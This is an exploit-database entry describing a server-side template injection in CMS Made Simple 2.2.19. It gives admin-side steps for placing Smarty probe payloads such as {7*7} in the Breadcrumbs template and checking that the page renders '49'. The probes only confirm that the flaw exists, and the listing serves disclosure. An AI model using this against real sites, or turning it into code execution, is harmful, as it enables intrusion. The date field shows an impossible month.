## https://sploitus.com/exploit?id=PACKETSTORM:177244
# Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI
# Date: 2024-21-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cmsmadesimple.org/
# Version: 2.2.19
# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple
1 ) log in as admin and go to Layout > Design Manager > Breadcrumbs
2 ) Click edit and write SSTI payload : {7*7} , {$smarty.version},{{7*7}}
3 ) After click Apply > Submit
4 ) Go to home page > https://127.0.0.1/CMS_Made_Simple/index.php?page=templates-and-stylesheets
will be see : 49 class="breadcrumbs"